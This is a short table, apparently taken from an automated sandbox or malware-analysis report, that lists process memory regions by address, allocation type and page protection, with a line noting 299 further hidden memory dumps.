2A2C6223000
|
trusted library allocation
|
page read and write
|
||
|
2A2C3142000
|
heap
|
page read and write
|
||
|
2A2C68F1000
|
trusted library allocation
|
page read and write
|
||
|
21DDF9D2000
|
heap
|
page read and write
|
||
|
21DDF9CE000
|
heap
|
page read and write
|
||
|
21DE174F000
|
heap
|
page read and write
|
||
|
2A2DD2B6000
|
heap
|
page read and write
|
||
|
21DDFA55000
|
heap
|
page read and write
|
||
|
21DDF9FE000
|
heap
|
page read and write
|
||
|
21DDF999000
|
heap
|
page read and write
|
||
|
2A2C31AE000
|
heap
|
page read and write
|
||
|
2A2DD30D000
|
heap
|
page read and write
|
||
|
2A2C4C30000
|
heap
|
page execute and read and write
|
||
|
2A2C6680000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
2A2C6185000
|
trusted library allocation
|
page read and write
|
There are 299 hidden memdumps, click here to show them.